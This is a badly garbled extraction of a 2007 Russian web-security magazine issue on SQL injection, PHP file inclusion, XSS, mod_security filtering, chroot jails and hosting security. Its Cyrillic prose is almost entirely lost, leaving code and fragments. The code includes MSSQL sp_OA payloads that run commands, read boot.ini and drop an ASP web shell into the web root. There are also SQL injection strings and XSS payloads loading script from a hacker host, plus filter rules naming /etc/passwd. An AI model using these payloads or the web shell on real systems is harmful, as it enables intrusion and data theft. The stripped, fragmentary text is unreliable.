SQL, , , , :

SQL
SELECT * FROM users WHERE username=
'$username'

MSSQL- ActiveX
Advanced SQL Injection In SQL Server Applications

(1)


-- Creates a WScript.Shell COM object through the OLE Automation procedures
-- and invokes its Run method (here just notepad.exe): arbitrary command
-- execution on the database host from inside a SQL batch.
-- NOTE(review): these sp_OA* procedures are normally reachable only by
-- highly privileged logins and can be disabled server-side — confirm the
-- web application's login cannot execute them.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
[ boot.ini]
-- Reads c:\boot.ini through Scripting.FileSystemObject: OpenTextFile returns
-- a TextStream handle in @f (the trailing 1 is presumably the ForReading
-- mode), ReadLine is called until it fails (@ret <> 0) and each line is
-- PRINTed back to the caller. @t is declared but never used.
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
shell
-- Drops a one-line ASP web shell into the IIS web root: CreateTextFile
-- makes c:\inetpub\wwwroot\foo.asp and WriteLine stores ASP that runs the
-- "cmd" query-string parameter through WScript.Shell. @t is unused.
-- NOTE(review): only works when the SQL Server service account can write
-- to the web root, i.e. web and database tiers share a box — a reason to
-- keep them separate and the service account unprivileged.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'
[ , ]
-- Proof-of-presence payload: registers a Speech.VoiceText object, sets its
-- speed and has the server's speakers read the string aloud, then waits
-- five seconds so the speech finishes before the batch ends.
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528
waitfor delay '00:00:05'

' OR '1'='1
, . ,
SQL-,
- :
SQL
'; DELETE FROM customers WHERE 1
or username = '
, SQL-. SQL . MySQL, ,
;). :
SELECT- , ,
, MySQL,
!
SQL
SELECT <columns> FROM <table>
INTO OUTFILE '<file>';
(requires the FILE privilege on the MySQL account and a path the mysqld process can write to, which is why an application's database user should never hold FILE)
, .
CMS upload.
.
, MySQL UNION. , .
, :
SQL
SELECT title, description FROM articles
WHERE id=$id;
Title description varchar, $id ,
:
SQL
SELECT title, description FROM articles
WHERE id=123123

32 02-07

Code injection

SQL Injection
XSS

(
-)

UNION
SELECT login, password FROM users;
/*
;
, , Union- .
MS SQL Server .
SQL
. ;).
code injection (: Ten Security Checks for PHP).
readfile, fopen, file, include, require. - ,
.
, , :
PHP
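// Allow-list of pages that may be included: only the KEYS of this array
// are valid values of $page (the values are unused).
// NOTE(review): the original declared $valid_file but looked up
// $valid_files, so isset() was always false and every request died.
// is_string() guards against an array being passed (?page[]=x), which
// would make the isset() lookup throw on PHP 8.
$valid_files = array(
    "index.php"  => "",
    "funct.php"  => "",
    "common.php" => "");
if (!isset($page) || !is_string($page) || !isset($valid_files[$page])) {
    die("
");
}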
, ,
:
PHP
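// Fallback when no allow-list (like $valid_file above) is used: accept only
// a relative path built from [a-z_./] with no ".." component. Two fixes
// over the original: eregi() no longer exists (PHP 7), and the original
// pattern accepted an absolute path such as "/etc/passwd", which contains
// no "..". The empty string is rejected too (include("") is never wanted).
if (!is_string($page)
    || !preg_match('/\A[a-z_.\/]+\z/i', $page)
    || strpos($page, '..') !== false
    || $page[0] === '/') {
    die("
");
}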
Back this up in php.ini: allow_url_fopen = Off (plus allow_url_include = Off on PHP 5.2+) and an open_basedir that restricts which directories PHP may open at all.
XSS. CMS. 99%
XSS. - -

, XSS (- MySpace).
.

HTML. HTML-
,
WYSIWYG-. , !
;). :
HTML, JavaScript. ,
<script> JavaScript (
, ). , ,
, !

XSS-
. , , ,
,
. ,
,
, .
, , ,
, .
XSS-
(: HTML
Code Injection and Cross-s
site scripting).
. HTML
:

BY EXAMPLE

,
-, .
. , , :). :
.

<script>alert('CSS
Vulnerable')</script>
<img csstest=javascript:alert('CSS
Vulnerable')>
&{alert('CSS Vulnerable')};
,
, .
GET- . ?var=qwerty ( ).
HTML-. '';!--"<CSS_Check>=&{()}. .
<CS_Check> ( ), ,
.
, .
.
. ,
.

,
. ,
,
PHP- ,
JavaScript.

XSS-, SQL-.
SQL- :
PHP-Nuke :). , , , , .
. XSS, SQL,
PHP-. ,
, , ()

: XXX.
XXX , ,
, ;).

.
, , . , , . :
!

: -

,
.


. , . -,
,
.
-,
,
:).
:
Df!2go#_^_7M, .

34 02-07



-
. ,
.
.

borisvolfson@gmail.com http://splendot.com

. ;). , , ,
-
. , HTML. , ,
,
( ). , .
JavaScript, , . , , , e-mail, SQL-,
.

AJAX, .
.
. , , --

,
. ,
.
,
JavaScript.
, .
. - , =).
. ,
.
, , . PHP ( magic quotes).
, ,

display_errors = Off    log_errors = On



. , ( 1).
. , . , , .
. POST ,
GET, :
URL
http://www.example.ru/index.php
?variable=value
? ? ,

.
, . ,
PHP, , $_REQUEST
(, ).
, ! ,
? , (
)! -

35

: , ?.
. -,

, , SQL-. -, , XSS .
,
,
. ,
JavaScript, ,
.
,
.
. , ,
, . .
. , ( ,

). PHP is_numeric ,
, .

MAGIC_QUOTES_GPC

, . regexp:
PHP
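// preg_match() replaces eregi() (removed in PHP 7); the /i flag keeps the
// case-insensitive matching and \z instead of $ stops "user@host.com\n"
// from passing. A sanity check only, not a full RFC-compliant validator.
preg_match('/^[A-Z0-9._%-]+@[A-Z0-9._%-]+\.[A-Z]{2,6}\z/i', $email)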
,
. , ,
:
.
,
.
PHP
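/**
 * Return true when $val, after trimming surrounding whitespace, consists of
 * one or more ASCII digits and nothing else.
 *
 * Changes from the original: it stripped *all* spaces before matching, so
 * "12 34" was accepted as an integer — interior whitespace is now rejected;
 * eregi() (removed in PHP 7) is replaced by preg_match(); the pattern is
 * anchored with \A..\z so a trailing newline cannot sneak past "$".
 * Note that no magnitude limit is applied: a 30-digit string passes even
 * though it overflows a PHP int.
 *
 * @param mixed $val candidate value (cast to string)
 * @return bool
 */
function is_unsigned_integer($val)
{
    $val = trim((string)$val);
    return preg_match('/\A[0-9]+\z/', $val) === 1;
}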

^([0-9])+$ ( )
, . .
Validate
PEAR, :
PHP
// Sketch of PEAR's Validate package (not a core extension); the statements
// are shown without their trailing semicolons.
// NOTE(review): "&new" (assigning a new object by reference) is a parse
// error from PHP 7.0 on — write "$validate = new Validate();".
$validate = &new Validate();
// letters, digits and spaces only
$validate->string( $username,
array('format'=>VALIDATE_ALPHA .
VALIDATE_NUM . VALIDATE_SPACE ) )
// syntactic e-mail check
$validate->email( $email )
// integer in the closed range 0..100
$validate->number( $age,
array( 'min'=>0, 'max'=>100 ) )
Validate false, .
: ,
. , , , ,
0 100.

GET

POST

SQL-

HTML

XSS

IP

1.

36 02-07

. ,
, ,
,
- SQL- XSS-.
, PHP

. , . , ( 1).
, magic_quotes, .
$_GET, $_POST,
$_COOKIE. ,
, :


,
.
.
;).

.
, ,
, . ;).
Strong password.
bruteforce, , .
,
.
. 6
:
, .

,
.

(, , 30) 35
-

PHP
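/**
 * Escape a request-supplied string for interpolation into a MySQL query.
 *
 * Removes the slashes magic_quotes_gpc added (where that option still
 * exists — it was dropped in PHP 5.4 and get_magic_quotes_gpc() itself in
 * PHP 8, hence the function_exists() guard), then escapes the value for
 * the connection.
 *
 * @param string      $value user-supplied value
 * @param mysqli|null $link  optional mysqli connection; when given, mysqli
 *                           is used instead of the legacy mysql_* extension
 *                           (removed in PHP 7)
 * @return string escaped value — safe ONLY inside a quoted string literal
 *
 * NOTE(review): escaping does nothing for an unquoted context such as
 * "WHERE id = $x"; prefer prepared statements with bound parameters.
 */
function escape_smart($value, $link = null)
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    if ($link !== null) {
        return mysqli_real_escape_string($link, $value);
    }
    return mysql_real_escape_string($value);
}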
BBcode wiki. -

, . - , -

. ,

.
CrackLib.

:
PHP
//
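// Dictionary/strength check with the PECL "crack" extension (CrackLib).
// The listing had lost the opening quote of the candidate password and
// wrapped the dictionary path over two lines; both are repaired here.
$dictionary = crack_opendict('/usr/local/lib/pw_dict');
// crack_opendict() returns false when the dictionary cannot be opened;
// carrying on would make every password look acceptable.
if ($dictionary === false) {
    die('cannot open CrackLib dictionary');
}
$check = crack_check($dictionary, 'Q6g$b87gHjn5_4t5sdf!23HLayi');
// Human-readable verdict for the last check.
$res = crack_getlastmessage();
echo $res; // 'strong password'
crack_closedict($dictionary);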
,
.
.
.
10
, ? ,
.
.
-



;).
, ,
.
( ),

, e.g. md5 — but note that an unsalted fast hash such as md5 is reversed in seconds for ordinary passwords (precomputed tables, brute force), so store a per-user salted hash produced by a slow function (crypt() with the Blowfish scheme, or PBKDF2) instead.
,
.
. , ,
, . ,
- ,
,
. ,
, .

, ,

.
: ,
,
.
IP. , IP .


.



,
,


, .

, ,
.

$_SERVER[HTTP_REFERER],

,
,
.


TELNET
,
, $_SERVER[HTTP_REFERER]
.
:
,

.

BBcode wiki. , HTML. :


BBcode
[b] ,
[i] [/i][/b],
a .
HTML-. ,
. :
HTML
<strong> ,
<em>
</em></strong>,
a .

XSS-, . ( )
, .
:

37

BBcode
// NOTE(review): strip_tags() keeps the attributes of the tags it allows, so
// "<strong onmouseover=...>" survives this call — an allowed-tag list is
// not an XSS filter by itself; attributes must be stripped separately, or
// better, generate the HTML from the BBcode yourself instead of accepting it.
$s = strip_tags($s, "<em><strong>");
,
: ,
BBcode, XSS.
: . , , . -,
, . :
Perl
# Prepared statement with a bound placeholder: the value travels separately
# from the SQL text, so quotes inside it cannot change the query.
$st = $db->prepare("SELECT user_name
FROM users WHERE id = ?;");
# NOTE(review): the placeholder stands for "id" but $email is bound to it —
# presumably a slip in the listing; bind the user id here.
$st->execute($email);

, .
, id
.
,
, .

string addslashes ( string str )

, ,

. \ + * ? [ ^ ] ( $ )
HTML- , ,
,
htmlspecialchars,
HTML- ()

mysql_query

string quotemeta ( string str )


string htmlspecialchars ( string string )
string htmlentities ( string string )
string mysql_real_escape_string
( string unescaped_string )
.
(MySQL ). ,
,
.
,
,
, . -

, .
outro. .
, ,
,
,
.

38

38

50

58

46

54

62

/ 67

-
100% .
- ,
. ,
?
,

ka Horrific
www.vr-online.ru

,
.
web-? , ,
: , .
? , .
:
;
;
.

( - ) .

:
1

, , . , ,

.
.

,
, . : , ,
, .
,
Linux-. , ,
,
.
, - ,
.
,

39

40 02-07

, ,
, .
Apache
mod_security. , ,
HTTP.
web-
, .
, ,
.
,
, URL-, .
, ?
.
mod_security

- , -, , . .
.
.

SQL Injection . . ,
, .
. 99%
MySQL-
MySQL,
,
.
,
.
.
MS SQL Server
public.
, . , .
web-
. Apache.

SQL Injection, XSS .

.
, .
mod_sequrity. , web- , , -

1 URL /ETC/PASSWD, ,
URL-.
2 URL JAVASCRIPT,
. POST.
<SCRIPT> ,
.
, , . , ,
.
3 URL
, , ,
.

mod_security
URL, ,
.
www.modsecurity.org. httpd.conf :

Jail

SecFilterEngine On

;
SecFilterCheckURLEncoding On
;
SecFilterForceByteRange 32 126
.

, 32,
. ,
, .
URL, . , 13 (carriage return), URL-encoded %0D — the encoding is hexadecimal, not %13. 32
126 ,
web-.
SecAuditLog logs/audit_log
,
;
SecFilterDefaultAction "deny,log,status:406"
(
DENY);
SecFilter xxx "redirect:http://www.webkreator.com"
,
HTTP://WWW.WEBKREATOR.COM;
SecFilter yyy "log,exec:/home/apache/report-attack.pl"

/HOME/APACHE/REPORT-ATTACK.PL;
SecFilter /etc/passwd

41


/ETC/PASSWD (

/ETC/SHADOW);
SecFilter /bin/ls


(
LS,
,
),

CAT, RM, CP, FTP ;
SecFilter "\.\./"
,
URL
,
;
SecFilter "delete[[:space:]]+from"
(Signature filters like this are only a second line of defence: "delete/**/from" or other comment/encoding tricks are not matched, so the query construction itself — parameterised statements — must be fixed first.)
DELETE FROM,

SQL-
.

LINUX-

, Linux,

,
chroot. chroot
web-. , web, , . ,
, , , .
chroot .
( Linux chroot), .
, , . chroot, jail.
.
chroot
Linux. /.
/bin, /etc, /home, /usr
.. /home

:
1 SecFilter "insert[[:space:]]+into"
SQL-
.
2 SecFilter "select.+from"
SQL-
.
3 SecFilter "<(.|\n)+>"
SecFilter "<[[:space:]]*script"
(the first rule rejects any request containing something that looks like an HTML tag, so it also blocks legitimate markup submitted through forms)
XSS-.

mod_rewrite. , URL-
. ,
.html
, .
html-
! ,
PHP
,
, .
mod_rewrite, -

.
,
chroot.
. /bin,
/usr .. , , /home/chroot,
. ,
/home/chroot
.
,
.
.

/etc, /home/chroot/etc, /etc.


, /home/chroot/etc

. /etc/passwd ,
/home/chroot/etc/passwd.
/home/chroot/etc/passwd, ,
.
, .

bin

usr

var

home

bin

bin

usr

bin

var

bin

home

user1

user2

web- Apache

, .
Mod_rewrite
, , ,
. ,
.
.htaccess.
, :
RewriteEngine on
Options +FollowSymlinks
RewriteBase /abc
RewriteEngine On .
FollowSymlinks,

. , RewriteBase,
URL.
, web-
/documents/article , ,
.htaccess. RewriteBase /erunda,
web- URL
/erunda/filename.php. URL, /documents/article/filename.php.

/documents/article, ,
, /erunda. ,
, .

, . RewriteRule.
:
RewriteRule
, ,
web- URL (, ).
, .
, . , news.php, .

42 02-07

,
: [0-9] , , , . :
news.php?id=$1
, $1
,
( )

mod_rewrite

id. URL 1 :
http://www._.ru/news.php?id=1
,
:
RewriteRule ^news_([0-9]+)\.htm news.php?id=$1
(the dot is escaped — unescaped, "." matches any character — and "+" rather than "*" stops an empty id from reaching news.php)

URL:
http://www._.ru/news_1.html

, :). , PHP-.
, . , , , , . [0-9]
, , .

, ,
! news.php
, mod_rewrite.
,
:
1
PHP-,
, .
2
.

index.php main.php, enter_to_my_private.php . -

URL, mod_rewrite
http://www._.ru/news.php?id=1 .
, ,
:
REWRITERULE
.
N E W S _ ( [ 0 -9
9]*).HTM
, ,
URL .

. ,
, , (^),
:).
(news_),
.
, , .
, URL-. -

mod_rewrite

news.php, my_99545_news.php. id, sid, index, start, page .. ,


, mod_rewrite , . ,
. , ,

.
, .
? , :
RewriteRule ^news_([a-z0-9]+)\.htm news.php?id=$1
(dot escaped, and "+" so the id cannot be empty)
, a z. , , , ..
, .
.
,
SQL Injection XSS.
, , .
,
, . , , , .

www.modsecurity.org
mod_security
http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
mod_rewrite

SAMSUNG NV-7

??
!
! ?
? - ,
? - ,
, ?
! , ,
.

.

!

:

, 1 2007 .
. 9
( ). (, ,
).
: , ,
, , .

: Samsung NV-7 c 7-
7- - Schneider-Kreuznach.
,
.
, , . ,
2-

, 1-
.

44 02-07

WWW.SL.RU

WWW.HOST-PLANET.RU

WWW.KOSMOHOST.COM

WWW.PETERHOST.RU

WWW.HOSTER.RU


PeterHost.Ru

SL.RU: (OpenSource) . ,
(httpload). ,
(rootkit check) ,
. (IDS) Snort.
HOST-P
P LANET.RU: Port
Sentry, Snort, IPPL. ,
c, courtney, Perl. , , .
KOSMOHOST.COM: .
iptables + (Clamav) + .
, ,
, , CMS, ..
. , , ,
( )
, .
, .
, , , , .
PETERHOST.RU: PeterHost.Ru
- .
, .
, , , , , , .
, .
HOSTER.RU: . 7 , .
,
, . DDoS.
SL.RU:
.
( ),
.
/VPS (PHP, FTP, Sendmail).
, .
(, PHP MySQL).
, ,
FireWall ( IP, ).
IP . IDS.
- , /
email .
HOST-P
P LANET.RU: ,
,
. .
, , , , .
, . ,
, , PHP- safe_mode.
KOSMOHOST.COM:
Nobody Check .
PETERHOST.RU: ,
. .
, ,
. ,
. , 8 ,
. c.

45

,
, PHP.
, , ,
,
( ).
HOSTER.RU: .
.

?


(
CHROOT)?

SL.RU: , IDS (),


Firewall (linux iptables, Cisco PIX ..) - (o).
DDoS- , Firewall,
.
HOST-P
P LANET.RU: mod_security ,
, .
KOSMOHOST.COM: iptables, ,
,
IP. mod_security, ,
, IP . , ,
.
PETERHOST.RU:
Apache MySQL - Nginx. ,
, . IP-
, Nginx .
IP DNS-. , , .
, .
.
HOSTER.RU: ,
.
SL.RU: (VPS) Linux Virtuozzo
OpenVZ. FreeBSD jail. chroot. VPS.
HOST-P
P LANET.RU: ftp-jail .
chroot'a , , , .

chroot.
KOSMOHOST.COM: CGI, . PHP web- Apache (PHP
Apache). SuPHP, PHP
CGI, .
PETERHOST.RU: ,
.
HOSTER.RU: chroot.
SL.RU: .
( , , ) backup
. 1, 2 3 1, 2 3
. backup , ,
.
, ( , , ). backup .
HOST-P
P LANET.RU: .
KOSMOHOST.COM: ,
.
PETERHOST.RU: , 2 7 .
HOSTER.RU: .
.

46 02- 07


, - .
, ,
. WEB- , ,
, - . , .
ka Horrific
www.vr-online.ru

? : .
. ,
, , , !
:
, , ,
,
.
, ,

. .
- .
,
, , . , , , , . -

, ,
.

, , !
, . ,

,
.

47

CyD NET Utils


www.cydsoft.com
shareware
300

CyD NET Utils



.
Security Test,



.
web- SQL Injection,
XSS, PHP-
.
, .


, proxy-.
proxy


,
,
,
.

www.apahelpcenter.org. -


File!Security test.


Test web server,


Security test.
,
URL
, ,

(
-).
URL www.apahelpcenter.org
OK. .

, .


SQL Injection. ,
,

.








(
,

).

PHP
ASP.

Macromedia Cold
Fusion. Perl ,
web- .
, , , , .

Acunetix Web
Vulnerability
Scanner
www.acunetix.com
shareware
$349

Acunetix
(
).

Google ads.



testphp.acunetix.com,
testasp.acunetix.com
testaspnet.acunetix.com.
,
,


.

,

.


:
,
.
Vulnerability Scanner
PHP, ASP
ASP.NET.

,

JavaScript-, .

,
HTTP
SOCKS -
.
,
: ,

;
; XSS,
SQL Injection, PHP-,
Google, ,
crlf-injection, ; ,
, (

, ,
).

350 ,


.

48 02- 07

SQL Injection Tools


, SQLHacK

/ . , , ,

.
,

.
?


url, ,
,
SQL Injection
tools:
1 url c ,
www.target.com/index.php?id=123.

url id=123.
2

,
,
, ,
www.target.com/index.php?id=123,
,
www.target.com/index.php?id=123'.
3 ,

.


,

SQL Injection tools.

n4n0bit
http://n4n.cup.su/
freeware
n4n0bit

CGI-. ,
PHP

, .

Perl,
Linux.
SQL/PHP-Injection
( , ), XSS web,
-

Paros
parosproxy.org

,
-,
Java

.

Paros
.
8080 .

.

, 127.0.0.1
8080.

,
Paros

.

. .
, ,
.
,
.
,

.


:
Paros
( ,
,
).

,
,

, ,
.
.

,

.

,
.

.
,
,
, .
100% , .

50 02-07

XSS
XSS
-
.


( ,
)
,

, XSS.
,

XSS .
Dr. Maxim Orlovsky (www.arhont.com)

. XSS- :
1



XSS-;
2

3

XSS-, ;
4
XSS-;
5
XSS-;


.
6

, XSS- , -
.
,
XSS. XSS- ( , )
, .
.
1 XSS DOM. , , JavaScript URL
HTML
Document Object Model (DOM,
). , HTML JavaScript-,

, XSS ,
.


XSS- (
). , .
, JavaScript- ( PHP).
, , .

<!-- Intentionally vulnerable DOM-based XSS example: everything after
     "name=" in document.URL is written into the page as HTML, so a value
     such as <script>alert(document.cookie)</script> executes. The fix is
     to treat the value as text (document.createTextNode, or HTML-encode it)
     rather than pass it to document.write(). -->
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
// indexOf("name=")+5 skips the parameter name (and yields 4 when absent)
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring
(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system
...
</HTML>

http://www.vulnerable.site/welcome.html?
name=<script>alert(document.cookie)
</script>

,
-

< >
URL-encoded %3C %3E.
.
# ( ), URL
, 6 Internet Explorer Mozilla .
http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)</script> .
2 XSS. .
(,

non-persistent reflected) .
, XSS-
HTML, CSS JavaScript-
( 1). , CSS
url(javascript:).
3 XSS. ,
, ,
( , ..).
:
( , ), XSS-
/ , !

51

2
2

XSS

XSS

XSS-
. -,
/. AJAX
JavaScript XMLHttpRequest.
XSS-

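/**
 * Issue an asynchronous HTTP GET for `url`.
 *
 * Uses the native XMLHttpRequest when the browser provides one and falls
 * back to the IE ActiveX "Microsoft.XMLHTTP" object otherwise.  In both
 * branches the request object is stored in `req` and `processReqChange`
 * (defined elsewhere, not shown here) is installed as the readystatechange
 * handler; nothing is returned, the caller observes the response through
 * that handler.
 *
 * As printed, the two comments were wrapped onto a second line, leaving the
 * bare words `object` and `version` as statements that throw ReferenceError
 * before the request is ever made; the comments are rejoined here.
 *
 * @param {string} url  Address to fetch.
 */
function HTTPRequest (url)
{
    // branch for native XMLHttpRequest object
    if (window.XMLHttpRequest) {
        // NOTE(review): req is assigned without var and so becomes a global;
        // kept that way because processReqChange presumably reads it.
        req = new XMLHttpRequest();
        req.onreadystatechange = processReqChange;
        req.open("GET", url, true);
        req.send(null);
    // branch for IE/Windows ActiveX version
    } else if (window.ActiveXObject) {
        req = new ActiveXObject("Microsoft.XMLHTTP");
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open("GET", url, true);
            req.send();
        }
    }
}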
HTTPRequest
("http://vulnerable-blog.com/vulerablescript.php?vulnerable-arg=<iframe
src=http://hacker-site/xss.js>");
,
, -

XSS-
. , ,
XSS,
XSS- ( , ), , , ,
. , ,
, ,
. .
, XSS-, , .
, XSS, . , XSS ,
. ,
. , XSS
.
, .
.
.

/ , <iframe src=http://hacker-site/xss.js>. ,
, MySpace,
-
DDoS'. DDoS
XSS- . , DDoS- (
XSS).
,
XMLHTTPRequest. ,
.

DDoS- ,
DDoS-. , XSS
.
: . -
XSS- , (
DDoS'),
. , XSS- ,
XSS-. ,

,
XSS-, .

XSS DOM

52 02-07


xss?
1
XSS .
- ,
XSS-,
. , XSS .
XSS-, .
, , XSS-.

2

, XSS.
-, - .
HTML-
XSS- . ,

. -, ,
. -, DDOS-,
XSS-. , -,
,
.

XSS
XSS


.
W3C
XSS. ,
XSS , ,
.

- .

,
. , URL
:
text'><script language='javascript'>
, HTML-
GET-, ( )
,
.
HTML-,
, :
<input ... value='here-goes-getparameter-passed-from-us'>
, XSS- ,
HTML, :
<input ... value='text'><script
language='javascript'>
, , HTML-
.
, ,
- .
-
: HTML-
.
XHTML, HTML
( DOCTYPE MIME),
, , :

text'/><script language='javascript'>
.
, , (
, ) : HTTP-

HTTP .
, , ,

.

, :
http://vlunerable.site/script_for_
uploading?file=eto-tipakartinka.js&encoding=utf-8%0AContenttype:%20text/html%0A%0A<html><head>
<script language='javasrript'
src=''></head></html>

URL-encoded.
. , . ,
, , , -, , .
URL- <script. ---, ,
<script,
<object..., <embed...,
<iframe. ?
, !
, HTML .
<head></head>, http-equiv. ? :
<title>Here-goes-parameter-fromURL</title><meta http-equiv='Location'
content='http://our.cool.hacker.site'>
CSS- , :
<style href='style.css'><meta
http-equiv='Location'
content='http://our.cool.hacker.site'>

,
&lt;?
HTML. HTML- onclick, onmouseover .
HTML- ,
JavaScript :
<input ... value='parameter'
onclick='..your-code..'>
?
html events? -

53

&quot;? .
src ,
href javascript:..code... . , , 6
<table background='javascript:'> . URL , .
: javascript ,
HTML-entities (&#x6A; ..),
events (onAbort, onActivate, onAfterPrint, onAfterUpdate, onBeforeActivate, onBeforeCopy ).
XSS.
, , .
.
, ( ). : HTML-, , JavaScript, , (, swf-).
, .
XSS? -,
.
HTML-XSS
,
. , , veryimportantcorpo-


XSS?
,
XSS txt
html-, JavaScript, VBScript, Java .


,
.
XSS ,
( ,

). ,
,

.

XSS-
C XSS-

ration.com , HTML. <iframe...


:). . ,
JavaScript,
DOM , , .

, JavaScript .
XSS .
,
HTML
.
.
.
(sensetive information , ,
)
JavaScript'a, . XMLHttpRequest

1
open
source frameworks ( ,
,
). ,
- XSS-
. ,

,
.
open source, , .
2 ,
. ,

. ,
GET POST-.
,


, ,
.
- , XSS-:

,
. XSS

.
3
, , , , ,
. . ,
(
, open source project),

, !

AJAX ( XSS-AJAX).
- - PHP-, ( ,
) , , . , XSS , XMLHttpRequest ,
.
XSS Proxy:
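/**
 * Issue an HTTP GET for `url` and return `req.responseText`.
 *
 * Same XMLHttpRequest / ActiveX selection as the earlier listing; the
 * request object is stored in the (undeclared, hence global) `req` and
 * `processReqChange` (defined elsewhere, not shown) is the readystatechange
 * handler.
 *
 * As printed, the wrapped comments left the bare words `object` and
 * `version` as statements, which throw ReferenceError; they are rejoined
 * here.
 *
 * NOTE(review): open() is called with async=true, so the return statement
 * runs before the response has arrived and returns whatever responseText
 * holds at that moment (typically the empty string); presumably the body is
 * meant to be read inside processReqChange instead.
 *
 * @param {string} url  Address to fetch.
 * @returns {string} The current value of req.responseText.
 */
function HTTPRequest (url)
{
    // branch for native XMLHttpRequest object
    if (window.XMLHttpRequest) {
        req = new XMLHttpRequest();
        req.onreadystatechange = processReqChange;
        req.open("GET", url, true);
        req.send(null);
    // branch for IE/Windows ActiveX version
    } else if (window.ActiveXObject) {
        req = new ActiveXObject("Microsoft.XMLHTTP");
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open("GET", url, true);
            req.send();
        }
    }
    return (req.responseText);
}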
var XSSCode = HTTPRequest
("http://hackersite.com/xss.php?everething-neededis-listed-here");
beyond the invisible. XSS .
. ,
. . XSS CSS , XSS- . , XSS.
-, RSS/Atom, XLink XPath XSS.

54 02- 07



XSS-
90% ,

andrusha@real.xakep.ru


AKA MUSTLIVE
{ID}
- 13
,
-2.
-
2001 .
-
Mustlive security pack
(http://websecurity.com.ua/security-pack/).

Mustlive perl pascal
programs interpreter (http://mlfun.org.ua/ppi/).
websecurity (http://websecurity.com.ua),

-.


-

Q:
?
A: .
, , , , , -. ,
,
,
,
.

( ,
).
- ( ,
, ), - , , . ,
,
.
,
( ).
,
. -


.

. , .
, .
, 10% ()
. , ,
, ,
Q:
,
SQL Injection XSS
-
?
A: .
: .

PHP
( PHP file inclusion).
XSS,
. SQL Injection.
,

55

56 02- 07

( ), Directory indexing, Full path disclosure .



Cross-Site Scripting, Full path
disclosure, PHP-, SQL Injection, Directory indexing .
Q: ,
, SQL Injection
XSS?
?
: , (, ),
. ,

, . , , ,
.

( ) , -, .
.
,
. ,

.


. -
( , -).
Q: ,

SQL Injection
XSS?
: , , ru u .
, .
Acunetix (http://websecurity.com.ua/120/):
SQL Injection 9%, Cross Site
Scripting 27% .
, , ( ).

ru
u XSS-
,
XSS-
90% . SQL Injection
,
10%
. XSS-
(http://websecurity.com.ua/127/), .
Q:
, ,

SQL Injection
XSS. ,
,

,
web.
?
: , . , . .
, ,

-, -
-.
.
- , http://websecurity.com.ua/security/. , , , ,
. ,

. , .
Q:


?
: ,
. - (,
ISS Internet Scanner
http://websecurity.com.ua/378/),
. . , -

(Mozilla )
(GVIM).
, . open source,
. open source,
(http://websecurity.com.ua),
.
, .
, .
(, , XSS),
, ,
,
.
,
( ).
Q:
?
: .
,
,
-
.
,
: ,
- , . ,
,
.
, , . ,

.
, .
,
, ,
. . , ,
.

Q:

?
: , . 60% -

,
59% ,
1% . 40% ,
30%
, 10% . 90% . . .
Q:
? -

,

SQL injection XSS?
:
,
.
, -,
. ,
- ,
.
, .

, .
,
-. , XSpider Positive Technologies ( 7-
). - http://online.xspider.ru.

- -. .
Q: ,
SQL Injection XSS?
?
: . ,
.
, . ,
(
)
.

. , MustLive Security
Pack (http://websecurity.com.ua/securitypack/) .
,
.

57

Q: SQL injection XSS



, Mail.ru?
: .
-,
. .
SQL injection
,
XSS .
:
xss images.yandex.ru
http://websecurity.com.ua/3/;
xss www.yandex.ru
http://websecurity.com.ua/36/;
xss -
,
XSS-
http://websecurity.com.ua/398/.
:
xss adstat.rambler.ru
http://websecurity.com.ua/11/;
xss www.rambler.ru
http://websecurity.com.ua/17/;
xss lenta.ru
http://websecurity.com.ua/23/;
xss horoscopes.rambler.ru
http://websecurity.com.ua/40/;
xss lenta.ru
http://websecurity.com.ua/149/.
Mail.ru:
xss drive.mail.ru
http://websecurity.com.ua/405/
,
:
aport.ru, go.km.ru, cnews.ru, www.rbc.ru,
www.quote.ru, spylog.ru, , 3dnews.ru
( blog.3dnews.ru) .
,
.
Q:

,
.
:
, .
?
: , , ,
.
- , ,
, (

,
). , ,
. ,
HTML, Perl
PHP
.
,
, -, . , .
- ,
,
,
, .

.
. .
SQL
Injection , ( Blind SQL
Injection). SQL DB Structure Extraction
XSS- ( XSS-,
).
Q: , flash
SQL injection
XSS? ?
: -,
, SQL Injection XSS.
- (, PHP ) .

. ( - , ) HTTP- (www.securitylab.ru/analytics/271169.php),
,
XSS- , .
,

, - . - , .
-

,

HTML ( -).
Flash http://websecurity.com.ua/18/, HTTP- http://websecurity.com.ua/373/.
Q:
XSS?
: .
(http://websecurity.com.ua/361/),
(www.securitylab.ru/analytics/271931.php),
XSS Proxy, backweb, BeEF Exploitation
Framework XSS Shell.
( )
,
, ,
.
XSS
,
(
)

(http://websecurity.com.ua/369/).
Q: ,

?
: .
. , , . , (http://websecurity.com.ua/security/), -.
-, - . . .
.


, , .

,
.

http://websecurity.com.ua/120/
-
http://websecurity.com.ua/127/


http://websecurity.com.ua/474/
u 2006
http://websecurity.com.ua/security/

http://websecurity.com.ua/378/
www.iss.net
http://online.xspider.ru
XSpider Online
http://websecurity.com.ua/security-p
pack/
MustLive Security Pack
http://websecurity.com.ua/3/
Cross-Site Scripting
http://websecurity.com.ua/36/

http://websecurity.com.ua/398/
Yandex-Direct
http://websecurity.com.ua/11/
